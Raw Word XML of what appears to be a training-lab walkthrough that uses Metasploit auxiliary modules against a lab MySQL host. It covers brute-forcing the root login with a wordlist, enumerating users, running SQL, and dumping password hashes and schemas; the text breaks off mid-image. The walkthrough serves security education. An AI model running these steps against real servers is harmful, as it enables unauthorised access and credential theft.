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2E74" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5241DF66" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>In this lab environment, you will be provided with GUI access to a Kali machine. The target machine running a MySQL service will be accessible at </w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44241BEE" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t> Your task is to run the following auxiliary modules against the target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630FBB31" w14:textId="58B900DE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auxiliary/scanner/mysql/mysql_version</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t xml:space="preserve"> — probes the MySQL server to identify its version and banner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8D3DA2" w14:textId="10E4197C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auxiliary/scanner/mysql/mysql_login</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t xml:space="preserve"> — tests credentials (brute-force or supplied) to find valid MySQL logins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E827333" w14:textId="0FDF44BD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auxiliary/admin/mysql/mysql_enum</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t xml:space="preserve"> — enumerates MySQL information (users, databases, privileges) after login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8A5567" w14:textId="29F69850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auxiliary/admin/mysql/mysql_sql</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t xml:space="preserve"> — runs arbitrary SQL queries on a compromised/authenticated MySQL server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFB1D25" w14:textId="79B5536E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auxiliary/scanner/mysql/mysql_file_enum</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r w:rsidR="00816BF6" w:rsidRPr="00816BF6">
        <w:t>check which files are available</w:t>
      </w:r>
      <w:r w:rsidR="00816BF6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1299EE49" w14:textId="0F83D8CA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auxiliary/scanner/mysql/mysql_hashdump</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t xml:space="preserve"> — extracts MySQL user password hashes from the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365711D4" w14:textId="1FDEFCDF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auxiliary/scanner/mysql/mysql_schemadump</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t xml:space="preserve"> — dumps database schemas (tables, columns) from accessible databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4553CB68" w14:textId="2EB8E9FB" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>auxiliary/scanner/mysql/mysql_writable_dirs</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r w:rsidR="004442D9" w:rsidRPr="004442D9">
        <w:t>finds folders the database can write to so an attacker (or admin) could create files there (e.g., with SELECT ... INTO OUTFILE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146018FC" w14:textId="1CE2A781" w:rsidR="00C510F6" w:rsidRDefault="00C510F6"/>
    <w:p w14:paraId="14DE52A1" w14:textId="473FD0A5" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5C9440" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t> Open the lab link to access the Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B04AE6" w14:textId="16B4C76A" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0679C948" wp14:editId="3601431B">
            <wp:extent cx="5943600" cy="3378200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="777168458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FF8B" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t> Check if the target machine is reachable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169954DC" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13593BD7" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>ping -c 4 demo.ine.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61595842" w14:textId="6D9315A5" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="000A6A19" w:rsidP="00C510F6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EB25620" wp14:editId="45A43D2F">
            <wp:extent cx="5943600" cy="1822450"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="6729555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55574" name="Picture 6729555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BBCF" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>The target is reachable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6080DA40" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t> Run an nmap scan against the target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A41B239" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555F20E7" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>nmap demo.ine.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7E22D9" w14:textId="522349E4" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="000A6A19" w:rsidP="00C510F6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2ED6809A" wp14:editId="7B4ADACC">
            <wp:extent cx="5207268" cy="1860646"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1511133143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3143" name="Picture 24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AC03" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>MySQL service is running on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D2A602" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t> Run the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>auxiliary/scanner/mysql/mysql_version</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t> module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2137A067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6E1144B1" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>msfconsole -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278519C3" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>use auxiliary/scanner/mysql/mysql_version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383A1134" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>set RHOSTS demo.ine.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B2B6AF" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3117134B" w14:textId="14FE3BE5" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="000A6A19" w:rsidP="00C510F6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="784C7A42" wp14:editId="470A03AA">
            <wp:extent cx="5924854" cy="2311519"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3957502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50229" name="Picture 395750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F52B" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 5:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t>: Run the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>auxiliary/scanner/mysql/mysql_login</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t> module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4609530E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6EC41128" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>use auxiliary/scanner/mysql/mysql_login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D319E6" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>set RHOSTS demo.ine.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27957BD3" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>set USERNAME root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBC1D74" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:lastRenderedPageBreak/>
        <w:t>set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C2AFC6" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>set VERBOSE false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DE2775" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9C75E3" w14:textId="41800046" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="000A6A19" w:rsidP="00C510F6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6697667A" wp14:editId="5AB2711C">
            <wp:extent cx="5943600" cy="3491865"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4699744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4464" name="Picture 4699744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831E" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 6:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t> Run the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>auxiliary/admin/mysql/mysql_enum</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t> module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AA0743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69E58EB9" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>use auxiliary/admin/mysql/mysql_enum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A132F0" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>set USERNAME root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112BF1F7" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>set PASSWORD twinkle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEE3CDD" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>set RHOSTS demo.ine.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A1C39A" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D9B234" w14:textId="523C2962" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="000A6A19" w:rsidP="00C510F6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="690C7ABA" wp14:editId="09BA0D11">
            <wp:extent cx="5943600" cy="4062095"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2971596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9662" name="Picture 297159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44C4" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 7:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t> Run the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>auxiliary/admin/mysql/mysql_sql</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t> module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD8DECE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66E8693D" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>use auxiliary/admin/mysql/mysql_sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1A3248" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>set USERNAME root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7107EE49" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>set PASSWORD twinkle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584D69B8" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>set RHOSTS demo.ine.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDD93C8" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7B34A0" w14:textId="3594E311" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="000A6A19" w:rsidP="00C510F6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BD7C856" wp14:editId="221534B8">
            <wp:extent cx="5867702" cy="2457576"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="160285449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449" name="Picture 28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B737" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 8:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t> Run the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>auxiliary/scanner/mysql/mysql_file_enum</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t> module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E791B1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15CD35E7" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>use auxiliary/scanner/mysql/mysql_file_enum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C99A978" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>set USERNAME root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E075688" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>set PASSWORD twinkle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8F75A5" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>set RHOSTS demo.ine.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA13DC5" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>set FILE_LIST /usr/share/metasploit-framework/data/wordlists/directory.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CB6796" w14:textId="62B879EF" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6"/>
    <w:p w14:paraId="4651C819" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A76426B" w14:textId="7C5BEEB9" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="009638E6" w:rsidP="00C510F6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DE237CD" wp14:editId="0FD99120">
            <wp:extent cx="5943600" cy="4441825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17404184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8497" name="Picture 17404184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624E" w14:textId="49F62278" w:rsidR="009638E6" w:rsidRDefault="009638E6" w:rsidP="00C510F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9523E6" wp14:editId="56469ACA">
            <wp:extent cx="5550185" cy="3270418"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1594781369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1369" name="Picture 30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ECD2" w14:textId="28A135D8" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 9:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t> Run the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>auxiliary/scanner/mysql/mysql_hashdump</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t> module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443007FC" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AF2445" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>use auxiliary/scanner/mysql/mysql_hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370F16C0" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>set USERNAME root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E8999E" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>set PASSWORD twinkle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5A3962" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>set RHOSTS demo.ine.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16584F87" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EFA94F" w14:textId="5B816521" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="009638E6" w:rsidP="00C510F6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E119927" wp14:editId="53D28541">
            <wp:extent cx="5943600" cy="4237990"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29792295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22951" name="Picture 3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2F8B" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 10:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t> Run the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>auxiliary/scanner/mysql/mysql_schemadump</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t> module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580F93ED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68AAE049" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>use auxiliary/scanner/mysql/mysql_schemadump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6B2DA7" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>set USERNAME root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C35767" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>set PASSWORD twinkle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FCEE73" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>set RHOSTS demo.ine.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52547822" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:lastRenderedPageBreak/>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D919FB3" w14:textId="0012B1E6" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="009638E6" w:rsidP="00C510F6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="683F82AB" wp14:editId="424C14DC">
            <wp:extent cx="5943600" cy="4252595"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
